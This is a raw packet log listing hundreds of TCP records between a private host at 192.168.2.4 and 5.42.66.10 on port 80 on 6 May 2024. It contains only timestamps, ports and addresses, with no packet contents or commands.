May 6, 2024 07:53:04.794106960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794114113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794117928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794127941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794137001 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794140100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794151068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794162035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794162989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794176102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794178963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794188976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794200897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794200897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794214010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794224024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794226885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794240952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794262886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794320107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794332981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794343948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794354916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794357061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794365883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794377089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794380903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794389963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794400930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794405937 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794413090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794423103 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794425011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794435024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794436932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794449091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794456005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794461966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794466972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794482946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794491053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794493914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794497967 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794506073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794516087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794518948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794531107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794538975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794543028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794554949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794564009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794579029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794601917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794621944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794634104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794646025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794660091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794661045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794668913 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794670105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794682026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794692039 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794693947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794704914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794712067 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794718027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794730902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794734001 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794742107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794753075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794759035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794774055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794776917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794785976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794796944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794800043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794807911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794815063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794820070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794826984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794832945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794843912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794856071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794858932 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794866085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794867039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794878960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794889927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794893026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794902086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794913054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794917107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794926882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794929981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794939995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794953108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794964075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794967890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794967890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794996977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795022011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795101881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795114040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795125008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795135975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795139074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795146942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795155048 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795159101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795170069 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795171022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795182943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795196056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795206070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795233011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795243979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795255899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795267105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795278072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795280933 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795289040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795289993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795300961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795310974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795312881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795325994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795326948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795337915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795348883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795351982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795361042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795368910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795382023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795392036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795393944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795403957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795414925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795416117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795425892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795428991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795437098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795449018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795454979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795460939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795476913 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795490026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795545101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795557022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795572042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795582056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795583963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795594931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795605898 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795607090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795618057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795628071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795629025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795641899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795645952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795653105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795665979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795667887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795677900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795687914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795690060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795701027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795701981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795711040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795722961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795733929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795737982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795744896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795746088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795757055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795759916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795768976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795780897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795788050 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795793056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795811892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795820951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795870066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795881987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795892954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795905113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795907021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795916080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795927048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795932055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795938969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795952082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795955896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795963049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795965910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795974016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795984983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.795993090 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.795996904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796008110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796019077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796019077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796030045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796032906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796041012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796052933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796056986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796063900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796076059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796082973 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796087980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796108961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796118975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796119928 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796135902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796145916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796145916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796152115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796164989 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796173096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796183109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796185017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796195984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796205044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796207905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796219110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796227932 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796231031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796241999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796246052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796255112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796267033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796267986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796278000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796282053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796288967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796303988 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796328068 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796330929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796343088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796355009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796365023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796365976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796376944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796390057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796391964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796401978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796412945 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796426058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796449900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796469927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796479940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796495914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796504021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796509027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796519995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796519995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796530962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796533108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796541929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796545029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796554089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796564102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796566963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796578884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796586990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796591043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796602964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796607018 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796613932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796631098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796653032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796655893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796667099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796679020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796689987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796690941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796701908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796705961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796714067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796717882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796726942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796735048 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796740055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796761036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796777010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796792030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796803951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796813965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796825886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796825886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796837091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796848059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796852112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796859980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796873093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796874046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796885014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796890020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796896935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796907902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796931028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796931028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796958923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796962023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.796972036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796982050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796994925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.796998024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797004938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797005892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797019005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797024965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797032118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797044039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797048092 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797071934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797095060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797115088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797127962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797137976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797149897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797153950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797161102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797164917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797172070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797178984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797183037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797194004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797198057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797205925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797215939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797223091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797228098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797230959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797240019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797252893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797262907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797265053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797276020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797282934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797287941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797300100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797307014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797312021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797322989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797328949 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.797334909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.797347069 CEST	49741	80	192.168.2.4	5.42.66.10
